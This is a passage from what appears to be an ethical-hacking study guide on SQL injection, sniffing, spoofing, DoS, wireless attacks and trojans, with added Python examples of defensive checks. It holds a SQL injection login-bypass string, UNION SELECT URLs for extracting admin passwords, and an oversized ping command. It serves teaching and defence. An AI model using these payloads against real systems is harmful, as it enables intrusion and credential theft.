Attackers typically scan for port 1433 to find Microsoft SQL databases. Once identified, the
attacker will place a single quote (') inside a username field to test for SQL vulnerabilities. The
attacker will look for a result similar to the one shown below:
Microsoft OLE DB Provider for SQL Server error '80040e14'
Unclosed quotation mark before the character string ' and Password=''.
/login.asp, line 42
This informs the attacker that SQL injection is possible. At this point, the attacker can shut down
the server, execute commands, extract the database, or do just about anything else he wants to
do.
SQL Injection Vulnerabilities
SQL servers are vulnerable because of poor coding practices, lack of input validation, and the
failure to update and patch the service. The two primary vulnerabilities are:
Unpatched Systems
Blank sa Password
Steps for performing SQL Injection
Now the most common question that arises is what tool one would require to carry out a
SQL attack. The answer is quite simple:
Any web browser is good enough for a SQL attack.
How to do a SQL attack?
First of all we should look for pages that allow user to submit data, like login page, search page,
feedback, etc. If we have a HTML page we should check the source code for whether it is using
POST or GET, look for the <Form> tag in the source code
<Form action=search.asp method=post>
<input type=hidden name=X value=Z>
</Form>
If not, check for pages like ASP, JSP, CGI, or PHP
Example:
Check a URL that takes the following parameters:
http://www.xsecurity.com/index.asp?id=10
In the above example, attackers might attempt:
http://www.xsecurity.com/index.asp?id=blah' or 1=1--
SQL Injection Techniques
In SQL Injection, the hacker uses SQL queries and creativity to get to the database of sensitive
corporate data through the web application. SQL or Structured Query Language is the computer
language that allows you to store, manipulate, and retrieve data stored in a relational database
(or a collection of tables which organize and structure data). SQL is, in fact, the only way that a
web application (and users) can interact with the database. Examples of relational databases
include Oracle, Microsoft Access, MS SQL Server, MySQL, and Filemaker Pro, all of which
use SQL as their basic building blocks.
SQL commands include SELECT, INSERT, DELETE and DROP TABLE. DROP TABLE is
as ominous as it sounds and in fact will eliminate the table with a particular name.
In the legitimate scenario of the login page example above, the SQL commands planned for the
web application may look like the following:
SELECT count(*)
FROM users_list_table
WHERE username='FIELD_USERNAME'
AND password='FIELD_PASSWORD'
In plain English, this SQL command (from the web application) instructs the database to match the
username and password input by the legitimate user to the combination it has already stored. Each
type of web application is hard coded with specific SQL queries that it will execute when
performing its legitimate functions and communicating with the database. If any input field of the
web application is not properly sanitized, a hacker may inject additional SQL commands that
broaden the range of SQL commands the web application will execute, thus going beyond the
original intended design and function. A hacker will thus have a clear channel of communication
(or, in layman terms, a tunnel) to the database irrespective of all the intrusion detection systems and
network security equipment installed before the physical database server. To test a site for SQL
injection, use a single quote in the input:
blah' or 1=1--
Login: blah' or 1=1--
Password: blah' or 1=1--
The next big thing is how to retrieve data. To get the login_name from the "admin_login" table:
http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 login_name FROM admin_login--
From the above, you get the login_name of the admin user. To get the password for login_name "yuri":
http://xsecurity.com/index.asp?id=10 UNION SELECT TOP 1 password FROM admin_login WHERE login_name='yuri'--
Tools for SQL Injection
Wpoison
Pearlscript
SQLDict
SqlExec
SQLbf
SQLSmack
SQL2.exe
AppDetective
Database Scanner
SQLPoke
NGSSQuirreL
SQLPing v2.2
Preventing SQL Injection
Preventing SQL injection is best achieved through the techniques discussed above. You should
also make sure that the application is running with only enough rights to do its job and implements
error handling, so that when the system detects an error, it will not provide the attacker with any
useable information.
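To make the login query above and this prevention advice concrete, here is an added example (not code from the original material) that builds the page's count(*) login query two ways against an in-memory SQLite database with constructed sample users: once by string concatenation, which the blah' or 1=1-- input bypasses and the lone ' probe makes leak a raw database error, and once with a parameterised query and generic error handling.

```python
import sqlite3

# Constructed sample accounts for this example (plaintext passwords only
# because the page's query compares them that way; real systems store hashes).
SAMPLE_USERS = [("yuri", "s3cret"), ("alice", "hunter2")]


def make_db():
    """In-memory database with the page's users_list_table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users_list_table (username TEXT, password TEXT)")
    conn.executemany("INSERT INTO users_list_table VALUES (?, ?)", SAMPLE_USERS)
    return conn


def login_vulnerable(conn, username, password):
    """The pattern the page warns about: user input pasted into the SQL text.
    Returns (status, detail) with status 'ok', 'denied' or 'error'."""
    query = ("SELECT count(*) FROM users_list_table "
             f"WHERE username='{username}' AND password='{password}'")
    try:
        (count,) = conn.execute(query).fetchone()
    except sqlite3.Error as exc:
        # The raw database error is returned to the client. This is the kind of
        # message (compare the 'Unclosed quotation mark' error above) that tells
        # an attacker the input reached the SQL parser unescaped.
        return ("error", str(exc))
    return ("ok", count) if count > 0 else ("denied", count)


def login_safe(conn, username, password):
    """Parameterised query: the driver binds the values as data, so a quote or
    '--' in the input can never change the statement's structure. Database
    errors would be logged server-side (omitted here) and only a generic
    message goes back to the client, as the prevention paragraph recommends."""
    try:
        (count,) = conn.execute(
            "SELECT count(*) FROM users_list_table WHERE username=? AND password=?",
            (username, password),
        ).fetchone()
    except sqlite3.Error:
        return ("error", "login failed")
    return ("ok", count) if count > 0 else ("denied", count)


if __name__ == "__main__":
    db = make_db()
    for user, pw in [("yuri", "s3cret"), ("blah' or 1=1--", "x"), ("'", "x")]:
        print(repr(user), "vulnerable:", login_vulnerable(db, user, pw),
              "safe:", login_safe(db, user, pw))
```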
SQL Injection in Oracle
UNIONS can be added to the existing statement to execute a second statement
SUBSELECTS can be added to existing statements
Data Definition Language (DDL) can be injected if DDL is used in a dynamic SQL string
INSERTS, UPDATES, and DELETES can also be injected
Anonymous PL/SQL block in procedures
SQL Injection in MySql
It is not easy to perform SQL injection in a MySql database. While coding with a MySql
application, the injection vulnerability is not exploited. It is difficult to trace the output. You can
see an error because the value retrieved is passed on to multiple queries with different numbers of
columns before the script ends. In such situations, SELECT and UNION commands cannot be
used.
8. NETWORK ATTACKS
Sniffers
A sniffer or packet analyzer can be software or hardware based. Its function is to capture and
decode network traffic. Sniffers typically place the NIC into promiscuous mode. Captured
traffic can be analyzed to determine problems in a network such as bottlenecks or performance
degradation. Sniffers can also be used by an attacker or unauthorized individual to capture clear
text passwords and data from the network. Protocols such as FTP, Telnet, and HTTP are
especially vulnerable as they pass all usernames and passwords in clear text.
Passive Sniffing
Passive sniffing is made possible through the use of hubs. As hubs treat all ports as one giant
collision domain, all traffic is visible. Unfortunately for the attacker, most modern networks no
longer use hubs. This makes the capture of unauthorized traffic more difficult. That is unless the
attacker is sniffing a wireless network as it acts as a hub, not a switch.
Active Sniffing
Switches do not operate like hubs. By default, they make each physical port a separate collision
domain. Therefore, active sniffing requires that the switch be manipulated in some fashion. The
objective is to force the switch to pass the attacker the needed traffic. Otherwise, the attacker
will only see the traffic bound for his particular port or broadcast traffic, which by default, is
passed to all ports.
Generic Sniffing Tools
These tools allow you to view real-time packet captures and configure filters for pre/post filtering.
Once the data is captured, these programs allow you to interactively view each packet and its
individual headers. Descriptions of the packet headers are summarized. Most will also allow you
to reconstruct individual TCP streams. Some of these programs are freely available, while others
are quite expensive.
WinDump – A Windows based command line TCPDump program
TCPDump – The most well-known Unix based sniffing program
Ethereal – A great GUI TCP/IP sniffer. It is free and available at http://www.ethereal.com
EtherPeek – A commercial grade sniffer developed by WildPackets
Specialized Sniffing Tools
Unlike the generic tools listed above, these tools capture specific types of traffic. These are
optimized for hacking and penetration testing as all the non-essential information has been
removed.
DSniff – Captures clear text usernames and passwords.
Mailsnarf - Optimized to capture clear text mail information.
URLsnarf – Builds a list of all browsed URLS.
Webspy – Opens the URL the victim is browsing on the attacker's computer
Cain – Sniff traffic, capture/crack passwords, and enumerate Windows networks.
Ettercap – Multipurpose sniffer/interceptor/logger for switched LANs.
Overcoming Switched Networks
Sniffing traffic on a switched network can be accomplished through one of two ways: Flooding or
ARP Spoofing.
Flooding
Flooding is simply the process of sending the switch more MAC addresses than the CAM
(Content Addressable Memory) can hold. Some, but not all switches that are flooded with such a
high amount of traffic will default open. Simply stated, these devices will begin to function as a
hub passing all traffic to all ports. One of the programs an attacker may use to attempt to
accomplish this technique is EtherFlood.
ARP Spoofing
This technique corrupts the ARP protocol to attempt the redirection of switched traffic. Normally,
ARP is used to resolve known IP addresses to unknown MAC addresses. Once the ARP
protocol has performed this resolution, the results are stored in the ARP cache. It is stored there
for a short period of time to speed consequent communications and reduce broadcast traffic. Since
ARP is a trusting protocol, a victim's computer will accept an unsolicited ARP response. This
unsolicited ARP response can be used to fool the victim's computer into communicating with the
wrong device. For the attacker to be successful, he must also fool the switch and enable IP
forwarding to move the data from his computer, to its true destination. At this point, he will have
successfully placed himself in the traffic stream and can capture all forthcoming data
transmissions. Several programs are available that can accomplish this attack. One such program
is
MAC Spoofing
MAC spoofing tools allow the attacker to pretend to be another physical device. This type of
attack may be used in situations where switch ports are locked by MAC address. These tools are
available for Windows and Linux. Some can even be used to spoof wireless network cards.
Macof – Floods the network with random MAC addresses
SMAC – Windows MAC address spoofing tool
MAC Changer – Linux MAC address spoofing tool
DNS Spoofing
DNS spoofing is a hacking technique used to inject DNS servers with false information. It enables
malicious users to redirect victims to bogus websites, or can be used for denial of service attacks. A
good understanding of DNS and zone files is required to pass the CEH exam. Zone files contain
SOA, NS, A, CNAME, and MX records. Other DNS record types include: PTR, HINFO, and
MINFO. The two basic approaches to DNS spoofing are:
Hijack the DNS query and redirect the victim to a bogus site
Hack the DNS server, thereby, forcing it to provide a false response to a DNS query
Two of the tools available to the attacker to perform DNS spoofing are:
WinDNSSpoof
Distributed DNS Flooder
Detecting Sniffers and Monitoring Traffic
It is not easy to detect sniffers on the network. Organizations should make sure their policies
disallow unauthorized sniffers. There should also be a heavy penalty placed on those found to be
in violation of such policies. There are some tools that can aid the network security administrator
in maintaining compliance with this policy, such as SniffDet, IRIS and NetIntercept.
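As an added example (not a tool from the original material), here is detection logic a network administrator could run over ARP replies and frame source addresses collected on a monitoring port; the records below are constructed and the thresholds are assumptions to tune per network. It flags the symptoms of the ARP spoofing and CAM flooding described above: an IP whose MAC changes, one MAC answering for several IPs, and a burst of distinct source MACs.

```python
from collections import Counter, defaultdict, deque

# Constructed ARP replies (timestamp, sender IP, sender MAC). The third record
# shows the gateway's IP suddenly answered by host .10's MAC, the fourth shows
# that MAC claiming yet another IP: the pattern of an ARP poisoning attempt.
SAMPLE_ARP_REPLIES = [
    (0.0, "192.168.1.1", "00:11:22:33:44:01"),
    (0.5, "192.168.1.10", "00:11:22:33:44:0A"),
    (1.0, "192.168.1.1", "00:11:22:33:44:0a"),
    (1.2, "192.168.1.20", "00:11:22:33:44:0a"),
]


def detect_arp_spoofing(replies):
    """Return alerts for IP->MAC changes and for one MAC claiming many IPs.
    Each alert is a tuple starting with its kind."""
    ip_to_mac = {}
    mac_to_ips = defaultdict(set)
    alerts = []
    for ts, ip, mac in replies:
        mac = mac.lower()                      # normalise before comparing
        previous = ip_to_mac.get(ip)
        if previous is not None and previous != mac:
            alerts.append(("ip-mac-change", ip, previous, mac, ts))
        ip_to_mac[ip] = mac
        if ip not in mac_to_ips[mac]:
            mac_to_ips[mac].add(ip)
            if len(mac_to_ips[mac]) > 1:
                alerts.append(("mac-claims-many-ips", mac, sorted(mac_to_ips[mac]), ts))
    return alerts


def detect_mac_flood(frames, window=1.0, threshold=100):
    """frames: (timestamp, source MAC) in time order. Return the timestamps at
    which more than `threshold` distinct source MACs were seen within `window`
    seconds, the signature of a tool filling the switch's CAM table."""
    recent = deque()
    live = Counter()          # distinct source MACs currently inside the window
    alerts = []
    for ts, mac in frames:
        recent.append((ts, mac))
        live[mac] += 1
        while recent and recent[0][0] < ts - window:
            _, old = recent.popleft()
            live[old] -= 1
            if live[old] == 0:
                del live[old]
        if len(live) > threshold:
            alerts.append(ts)
    return alerts


def build_sample_frames():
    """Constructed traffic: five real hosts for ten seconds, then 300 frames
    from 300 different source MACs within a third of a second."""
    frames = [(i * 0.1, f"00:11:22:33:44:{i % 5:02x}") for i in range(100)]
    frames += [(10.0 + i * 0.001, f"02:00:00:00:{i // 256:02x}:{i % 256:02x}")
               for i in range(300)]
    return frames


if __name__ == "__main__":
    for alert in detect_arp_spoofing(SAMPLE_ARP_REPLIES):
        print("ARP:", alert)
    flood = detect_mac_flood(build_sample_frames())
    print("MAC flood first seen at t=%.3f s (%d alerts)" % (flood[0], len(flood)))
```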
Denial of Service (DOS)
A DoS attack is any type of attack that brings a system offline or otherwise makes a host's service
unavailable to legitimate users. Early DoS attacks were often described as annoying, frustrating,
or a nuisance. Modern DoS attacks have increased in sophistication and can render a network
unusable. These attacks can cost corporations money through lost sales and profits. While it may
be difficult to place an exact monetary figure on DoS attacks, they are costly.
DoS attacks, or Denial of Service attacks, have become very common amongst hackers, who use
them as a path to fame and respect in the underground groups of the Internet. A Denial of Service
attack basically means denying valid Internet and network users the use of the services of
the target network or server. It means launching an attack which will temporarily
make the services offered by the network unusable by legitimate users. In other words, one can
describe a DoS attack as one in which you clog up so much memory on the target system that it
cannot serve legitimate users, or you send the target system data packets which it cannot
handle, thus causing it to either crash, reboot or, more commonly, deny services to legitimate
users.
Common DoS Attacks
Popular DoS attacks can be separated into three categories:
Bandwidth
Protocol
Logic
Common DoS Attack Strategies
No matter the type, the end result is the same, loss of service for the legitimate users. Some of the
more common DoS attack strategies are: Ping of Death, SSPing, Land, Smurf, SYN Flood, Win
Nuke, Jolt2, Bubonic, Targa, and Teardrop.
Common DDoS (Distributed DoS) Attacks
DDoS software has matured beyond the point where it can only be used by the advanced attacker.
The most powerful DDoS programs are open source code. While these programs reside in the
virtual space of the Internet, programmers tweak them, improve them, and add features to each
successive iteration. Some common DDoS attack strategies are:
Trin00, TFN, TFN2K, Stacheldraht, Shaft and Mstream.
DDoS Attack Sequence
DDoS attacks follow a two-prong attack sequence:
Mass Intrusion
Attack Phase
DoS attacks are of the following different types:
Those that exploit vulnerabilities in the TCP/IP protocol suite.
Those that exploit vulnerabilities in the IPv4 implementation.
There are also some brute force attacks, which try to use up all resources of the target
system and make the services unusable.
Some common vulnerabilities in TCP/IP are Ping of Death, Teardrop, SYN attacks and Land
Attacks.
Ping of Death
This vulnerability is quite well known and was earlier commonly used to hang remote systems (or
even force them to reboot) so that no users can use its services. This exploit no longer works, as
almost all system administrators would have upgraded their systems making them safe from such
attacks. In this attack, the target system is pinged with a data packet that exceeds the maximum
bytes allowed by TCP/IP, which is 65 536. This would have almost always caused the remote
system to hang, reboot or crash. This DOS attack could be carried out even through the command
line, in the following manner:
The following Ping command creates a giant datagram of the size 65540 for Ping. It might hang the
victim's computer:
C:\windows>ping -l 65540
Teardrop
The Teardrop attack exploits the vulnerability present in the reassembling of data packets.
Whenever data is being sent over the Internet, it is broken down into smaller fragments at the
source system and put together at the destination system. Say you need to send 4000 bytes of data
from one system to the other, then not all of the 4000 bytes is sent at one go. This entire chunk of
data is first broken down into smaller parts and divided into a number of packets, with each packet
carrying a specified range of data. For Example, say 4000 bytes is divided into 3 packets,
then:
The first Packet will carry data from 1 byte to 1500 bytes
The second Packet will carry data from 1501 bytes to 3000 bytes
The third packet will carry data from 3001 bytes to 4000 bytes
These packets have an OFFSET field in their TCP header part. This Offset field specifies from
which byte to which byte that particular data packet carries data, or the range of data that it is
carrying. This, along with the sequence numbers, helps the destination system to reassemble the
data packets in the correct order. Now in
this attack, a series of data packets are sent to the target system with overlapping Offset field
values. As a result, the target system is not able to reassemble the packets and is forced to crash,
hang or reboot.
Say for example, consider the following scenario (Note: _ _ _ = 1 data packet):
Normally a system receives data packets in the following form, with no overlapping Offset values.
_ _ _ _ _ _ _ _ _
(1 to 1500 bytes) (1501 to 3000 bytes) (3001 to 4500 bytes)
Now in a Teardrop attack, the data packets are sent to the target computer in the following format:
_ _ _ _ _ _ _ _ _
(1 to 1500 bytes) (1500 to 3000 bytes) (1001 to 3600 bytes)
When the target system receives something like the above, it simply cannot handle it and will crash
or hang or reboot.
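As an added example (not from the original material), this fragment checker applies the two sanity rules that fixed both attacks above: a reassembled datagram may not exceed 65,535 bytes (Ping of Death) and fragments may not overlap (Teardrop). Offsets are in bytes as in the depiction above, not in the 8-byte units of the real IP header, and the fragment lists are constructed.

```python
MAX_DATAGRAM = 65535  # IPv4 total length is a 16-bit field


def make_fragments(total_len, payload_per_fragment=1480):
    """Split a payload of total_len bytes into (offset, length, more_fragments)
    tuples, as a sending host would. 1480 is the usual Ethernet MTU payload."""
    fragments = []
    offset = 0
    while offset < total_len:
        length = min(payload_per_fragment, total_len - offset)
        more = offset + length < total_len
        fragments.append((offset, length, more))
        offset += length
    return fragments


def check_fragments(fragments):
    """Validate a set of fragments before reassembly.
    Returns (ok, reason). Rejects overlaps, gaps, inconsistent flags and any
    datagram that would reassemble to more than MAX_DATAGRAM bytes."""
    if not fragments:
        return (False, "no fragments")
    ordered = sorted(fragments)          # fragments may arrive in any order
    expected = 0                         # next byte offset we expect to see
    last = len(ordered) - 1
    for i, (offset, length, more) in enumerate(ordered):
        if length <= 0:
            return (False, f"empty fragment at offset {offset}")
        if offset < expected:
            return (False, f"overlap: fragment at {offset} overlaps data up to "
                           f"{expected} (teardrop pattern)")
        if offset > expected:
            return (False, f"gap: missing bytes {expected}-{offset - 1}")
        expected = offset + length
        if expected > MAX_DATAGRAM:
            return (False, f"oversized: reassembles to {expected} bytes > "
                           f"{MAX_DATAGRAM} (ping of death pattern)")
        if more and i == last:
            return (False, "incomplete: last fragment still has more-fragments set")
        if not more and i != last:
            return (False, f"data after final fragment at offset {offset}")
    return (True, f"ok: {expected} bytes in {len(ordered)} fragments")


# Constructed cases mirroring the page's depictions (0-based byte offsets).
NORMAL = [(0, 1500, True), (1500, 1500, True), (3000, 1500, False)]
TEARDROP = [(0, 1500, True), (1499, 1501, True), (1000, 2600, False)]

if __name__ == "__main__":
    for name, frags in [("normal", NORMAL), ("teardrop", TEARDROP),
                        ("4000-byte payload", make_fragments(4000)),
                        ("65540-byte payload", make_fragments(65540))]:
        print(f"{name:20s} -> {check_fragments(frags)}")
```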
SYN Attack
The SYN attack exploits TCP/IP's three-way handshake. Thus in order to understand as to how
SYN Attacks work, you need to first know how TCP/IP establishes a connection between two
systems. Whenever a client wants to establish a connection with a host, then three steps take place.
These three steps are referred to as the three-way handshake.
In a normal three way handshake, what happens is that, the client sends a SYN packet to the
host, the host replies to this packet with a SYN ACK packet. Then the client responds with a
ACK (Acknowledgement) packet. This will be clearer after the following depiction of these
steps:
1. Client --------SYN Packet-------------->Host
In the first step the client sends a SYN packet to the host, with whom it wants to establish a three-
way connection. The SYN packet requests the remote system for a connection. It also contains the
Initial Sequence Number or ISN of the client, which is needed by the host to put back the
fragmented data in the correct sequence.
2. Host -------------SYN/ACK Packet---------->Client
In the second step, the host replies to the client with a SYN/ACK packet. This packet
acknowledges the SYN packet sent by the client and sends the client its own ISN.
3. Client --------------ACK----------------------->Host
In the last step the client acknowledges the SYN/ACK packet sent by the host by replying with a
ACK packet. These three steps together are known as the 3-way handshake and only when they are
completed is a complete TCP/IP connection established.
In a SYN attack, several SYN packets are sent to the server, but all these SYN packets have a bad
source IP address. When the target system receives these SYN packets with bad IP addresses, it
tries to respond to each one of them with a SYN ACK packet. The target system then waits for an
ACK message to come from the bad IP address. However, as the bad IP does not actually exist, the
target system never receives the ACK packet. It thus queues up all these requests until it
receives an ACK message. The requests are not removed unless and until the target system
gets an ACK message. Hence these requests take up or occupy valuable resources of the target
machine. To actually affect the target system, a large number of SYN packets with bad IPs have to be
sent. As these packets have a bad source IP, they queue up, use up resources and memory of the
target system and eventually crash, hang or reboot the system.
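The following added example (not from the original material) simulates the half-open queue the page describes and the usual mitigation, SYN cookies, in which the server encodes its ISN as a keyed hash of the connection tuple and a coarse time slot instead of storing state for each SYN. The capacity, secret and addresses are constructed for the simulation.

```python
import hashlib
import hmac


class SynBacklog:
    """Stateful half-open queue: every SYN occupies a slot until the matching
    ACK arrives or the entry times out, which is what a SYN flood exhausts."""

    def __init__(self, capacity=256, timeout=60.0):
        self.capacity = capacity
        self.timeout = timeout
        self.half_open = {}  # (client ip, client port) -> time of SYN

    def on_syn(self, client, now):
        expired = [c for c, t in self.half_open.items() if now - t > self.timeout]
        for c in expired:
            del self.half_open[c]
        if len(self.half_open) >= self.capacity:
            return False          # queue full: the SYN is dropped
        self.half_open[client] = now
        return True

    def on_ack(self, client, now):
        return self.half_open.pop(client, None) is not None


class SynCookieServer:
    """Stateless alternative: the ISN in the SYN/ACK is a cookie derived from
    the connection tuple and a time slot. Nothing is stored per SYN, so spoofed
    SYNs whose ACK never comes cost no memory; a real ACK is verified by
    recomputing the cookie."""

    def __init__(self, secret, slot_seconds=64):
        self.secret = secret
        self.slot_seconds = slot_seconds

    def _cookie(self, client, slot):
        msg = f"{client[0]}:{client[1]}:{slot}".encode()
        digest = hmac.new(self.secret, msg, hashlib.sha256).digest()
        return int.from_bytes(digest[:4], "big")   # 32-bit ISN

    def on_syn(self, client, now):
        return self._cookie(client, int(now // self.slot_seconds))  # ISN to send

    def on_ack(self, client, ack_number, now):
        slot = int(now // self.slot_seconds)
        expected = (ack_number - 1) & 0xFFFFFFFF    # ACK number is ISN + 1
        return any(expected == self._cookie(client, s) for s in (slot, slot - 1))


def spoofed_clients(n):
    """Constructed spoofed source addresses that will never send an ACK."""
    return [(f"203.0.113.{i % 254 + 1}", 1024 + i) for i in range(n)]


def legit_connects_with_backlog(flood=1000, capacity=256):
    """Does a legitimate client get through a stateful backlog after a flood?"""
    server = SynBacklog(capacity)
    for client in spoofed_clients(flood):
        server.on_syn(client, now=0.0)
    legit = ("198.51.100.7", 40000)
    return server.on_syn(legit, now=1.0) and server.on_ack(legit, now=1.1)


def legit_connects_with_cookies(flood=1000):
    """Same scenario against a SYN-cookie server."""
    server = SynCookieServer(secret=b"constructed-demo-secret")
    for client in spoofed_clients(flood):
        server.on_syn(client, now=0.0)          # nothing stored
    legit = ("198.51.100.7", 40000)
    isn = server.on_syn(legit, now=1.0)
    return server.on_ack(legit, isn + 1, now=1.1)


if __name__ == "__main__":
    print("backlog server, legit client connected:", legit_connects_with_backlog())
    print("cookie server, legit client connected:", legit_connects_with_cookies())
```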
Land Attacks
A Land attack is similar to a SYN attack, the only difference being that instead of a bad IP
Address, the IP address of the target system itself is used. This creates an infinite loop
between the target system and the target system itself. However, almost all systems have filters
or firewalls against such attacks.
Smurf Attacks
A Smurf attack is a sort of Brute Force DOS Attack, in which a huge number of Ping Requests
are sent to a system (normally the router) in the Target Network, using Spoofed IP Addresses
from within the target network. As and when the router gets a PING message, it will route it or
echo it back, in turn flooding the Network with Packets, and jamming the traffic. If there are a large
number of nodes, hosts, etc. in the network, then it can easily clog the entire network and prevent
any use of the services provided by it. Read more about the Smurf Attacks at CERT:
http://www.cert.org/advisories/CA-98.01.smurf.html
UDP Flooding
This kind of flooding is done against two target systems and can be used to stop the services
offered by any of the two systems. Both of the target systems are connected to each other, one
generating a series of characters for each packet received or in other words, requesting UDP
character generating service while the other system, echoes all characters it receives. This creates
an infinite non-stopping loop between the two systems, making them useless for any data
exchange or service provision.
Distributed DOS Attacks
DoS attacks are not new; in fact they have been around for a long time. However, there has been a
recent wave of Distributed Denial of Service attacks which pose a great threat to security and are
on the verge of overtaking viruses/Trojans to become the deadliest threat to Internet security. In
almost all of the above TCP/IP vulnerabilities being exploited by hackers, there is a high chance of
the target's system administrator or the authorities tracing the attack and getting hold of the
attacker. What is commonly done instead is this: say a group of 5 hackers join and decide to bring
a Fortune 500 company's server down. Each one of them breaks into a smaller, less protected
network and takes it over. They now have 5 networks and, supposing there are around 20 systems
in each network, around 100 systems in all to attack from. Sitting at their home computers, they
connect to the hacked, less protected networks, install a Denial of Service tool on them and, using
these hacked systems in the various networks, launch attacks on the actual Fortune 500 company.
This makes the hackers harder to detect and helps them do what they wanted to do without getting
caught. As they have full control over the smaller, less protected networks, they can easily remove
all traces before the authorities get there. Not even a single system connected to the Internet is safe
from such DDoS attacks. All platforms, including UNIX and Windows NT, are vulnerable to such
attacks. Even MacOS has not been spared, as some Macs are being used to conduct such DDoS
attacks.
Preventing DoS Attacks
No solution provides complete protection against the threat of DoS attacks. However, there are
things you can do to minimize the effect of a DoS attack. These include:
Practice the principle of Least Privilege
Limit bandwidth
Configure aggressive ingress and egress filtering
Keep computers up to date and patched
Implement load balancing
Implement IDS
DoS Scanning Tools
If you believe that your computer may have been compromised, the best practice is to use a
scanning tool to check for DoS infestation. There are several tools to help with this task. Some of
these include: Find_ddos, SARA, DdoSPing, RID and Zombie Zapper.
9. WIRELESS HACKING
Introduction –Wireless Networking
Wireless networking technology is becoming increasingly popular and at the same time has
introduced several security issues.
The popularity of wireless technology is driven by two primary factors:
Convenience
Cost
A wireless local area network (WLAN) allows workers to access digital resources without being
locked to their desks.
Laptops can be carried into meetings or even into a Starbucks café, tapping into a wireless
network. This convenience has become affordable.
Business and Wireless Attacks
Business is at high risk from wireless hackers who don't need any physical entry into the
business network to hack, but can easily compromise the network with the help of freely
available tools.
War driving, war chalking and war flying are some of the ways that a wireless hacker can
find and access a firm's vulnerable network.
Components of a Wireless Network
Wi-Fi Radio devices
Access points
Gateways
Types of Wireless Network
Four basic types
Peer to peer
Extension to a wired network
Multiple access points
LAN to LAN Wireless network
Setting up WLAN
When setting up a WLAN, the channel and service set identifier (SSID) must be
configured in addition to traditional network settings such as IP address and subnet
mask.
The channel is a number between 1 and 11 and designates the frequency on which the
network will operate.
The SSID is an alphanumeric string that differentiates networks operating on the same
channel.
It is essentially a configurable name that identifies an individual network. These settings
are important factors when identifying WLANs and sniffing traffic.
SSID (Service Set Identifier)
The SSID is a unique identifier that wireless networking devices use to establish and maintain
wireless connectivity.
SSIDs act as a single shared password between access points and clients.
Security concerns arise when the default values are not changed, as these units can then be
easily compromised.
What is Wired Equivalent Privacy (WEP)
WEP is a component of the IEEE 802.11 WLAN standards. Its primary purpose is to
provide for confidentiality of data on wireless networks at a level equivalent to that
of wired LANs.
Wired LANs typically employ physical controls to prevent unauthorized users from
connecting to the network and viewing data. A wireless LAN can be accessed without
physically connecting to the LAN.
IEEE chose to employ encryption at the data link layer to prevent unauthorized
eavesdropping on a network. This is accomplished by encrypting data with the RC4
encryption algorithm.
Denial-of-Service attacks
Wireless LANs are susceptible to the same protocol-based attacks that plague wired LANs.
WLANs send information via radio waves on public frequencies, thus they are
susceptible to inadvertent interference from traffic in the same radio band.
Various types of DoS attacks:
- Physical layer
- Data-link layer
- Network layer
Man-In-The-Middle-Attack (MITM)
Eavesdropping - Happens when an attacker receives a data communication stream.
- Not using security mechanisms such as IPsec, SSH or SSL makes the data vulnerable to an
unauthorized user.
Manipulation - An extended step of eavesdropping.
- Can be done via ARP poisoning.
Hacking Wireless Networks
Wireless networking technologies become more popular each day. The reasons are simple;
wireless networks are easy to configure, easy to use, require no cabling and are inexpensive.
802.11 Standards
The IEEE 802.11 committee sets the standards for the wireless protocol. The three wireless
standards include:
802.11a – Speeds up to 54 Mbps
802.11b – Speeds up to 11 Mbps
802.11g – Speeds up to 54 Mbps
WEP
WEP (Wired Equivalent Privacy) was originally designed to protect wireless networks from
eavesdropping through the use of a 40-bit key. The key was limited to 40 bits, due to export rules
that existed during the late 1990s when the 802.11 protocol was developed. This provides a very
limited level of encryption that is relatively easy to compromise. WEP is vulnerable because it uses
a relatively short IV (Initialization Vector) and the key remains static. Luckily, there are protection
mechanisms that make wireless more secure. These include:
WPA – Wireless Protection Access, a replacement for WEP
LEAP – Cisco's Lightweight Extensible Authentication Protocol
PEAP – Protected Extensible Authentication Protocol
Finding WLANs
Finding unsecured wireless networks has become quite a fad; some criminal hackers are making a
game of driving around and connecting to as many networks as they can. One of the most well-
known tools for finding WLANs is NetStumbler.
Cracking WEP Keys
Because of the weaknesses of WEP, locked networks can be accessed as long as enough packets
can be captured. Two tools used to break into WEP secured networks are AirSnort and WEP
Crack.
Sniffing Traffic
Just as in the wired world, there are tools that can be used to capture and sniff wireless traffic.
They include AiroPeek and Kismet.
Wireless Attacks
Wireless networks can be attacked by several different methods. The two most common are:
Wireless DoS and Access Point Spoofing.
Securing Wireless Networks
Fortunately, there are ways to secure wireless networks. A good starting point is to turn on WEP
and change the SSID (Service Set Identifier). Changing the SSID and enabling WEP is only the
first step, since it is still transmitted in clear text. You should continue by carefully considering the
placement of your WAPs and restricting the allocation of DHCP addresses on the wireless network
segment. Other considerations include:
Prohibit access from unknown MAC addresses
Use Strong Authentication such as RADIUS
Consider IPSec
Build a network that maintains defense in depth
10. TROJANS & BACKDOORS
Trojan horses are programs that are malicious in nature but are disguised as benign. Once
executed, they plant unwanted malicious code on the user's computer. These programs can, among
other things, steal passwords, provide remote access, log keystroke activity, or destroy data.
Trojans are nothing but remote administration tools (RATs) that provide attackers with remote
control and remote access to the victim system. In other words, once a system has been infected
with a Trojan, an attacker can remotely control almost all hardware and software on it. Modern-day
Trojans have become extremely advanced and provide attackers with a variety of different
sophisticated features for remote control. Once a Trojan has been installed on a system, not
only is all its data under threat, but there is also a high possibility that the compromised system
may be misused to initiate an attack on some third-party system.
Trojans are clearly extremely dangerous tools that are capable of doing a lot of harm to the victim
system. Some of the most common malicious activities that can be conducted with the help of
Trojans are as follows:
Trojans are most commonly used by attackers to steal sensitive IP data from the
victim corporations.
A number of Trojans have inbuilt logging capabilities.
Almost all Trojans can also be used for purely malicious purposes.
Attackers often use Trojans to exploit the resources of your system (and network) to
execute attacks on pre-defined victim systems.
What is a Trojan Horse?
The story of the Trojan Horse comes from the classic novel, The Iliad, where the Trojans placed
the gift of a tall wooden horse at the city gates. The city inhabitants accepted the gift and moved it
inside. Then, during the middle of the night, soldiers who were hiding inside the horse slipped out
and attacked the city's inhabitants. Trojan programs, just as with the historical version, require
the user to accept the malicious gift. Once executed, the system is infected. Therefore, the best
defense is to make sure users are trained not to download or install unsolicited applications.
Working
The working of Trojans is quite easy to understand, and using them requires almost no technical
knowledge. Most Trojans are made up of two main parts:
1. The Server part: it is installed on the victim's system through trickery or disguise.
2. The Client part: it is installed on the attacker's system and is then used to connect to
the server part of the Trojan installed on the victim's system.
An attacker can carry out a Trojan attack on the target system by following these simple
steps:
